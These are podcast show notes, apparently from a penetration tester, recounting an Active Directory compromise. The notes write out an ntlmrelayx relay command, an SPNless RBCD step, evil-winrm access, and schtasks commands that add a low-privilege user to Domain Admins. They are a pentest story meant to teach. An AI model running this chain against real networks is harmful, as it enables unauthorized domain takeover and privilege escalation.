Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today's episode: Got an SA account to a SQL server through Snaffler-ing With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv I didn't have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f …and ran it: schtasks /run /tn "TotallyFineTask"
No persons identified in this episode.
This episode hasn't been transcribed yet
Help us prioritize this episode for transcription by upvoting it.
Popular episodes get transcribed faster
Other recent transcribed episodes
Transcribed and ready to explore now
Before the Crisis: How You and Your Relatives Can Prepare for Financial Caregiving
06 Dec 2025
Motley Fool Money
Anthropic Finds AI Answers with Interviewer
05 Dec 2025
The Daily AI Show
#2423 - John Cena
05 Dec 2025
The Joe Rogan Experience
Warehouse to wellness: Bob Mauch on modern pharmaceutical distribution
05 Dec 2025
McKinsey on Healthcare
The method of invention, AI's new clock speed and why capital markets are confused
05 Dec 2025
Azeem Azhar's Exponential View
Meta Stock Surges on Plans for Metaverse Cuts
05 Dec 2025
Bloomberg Tech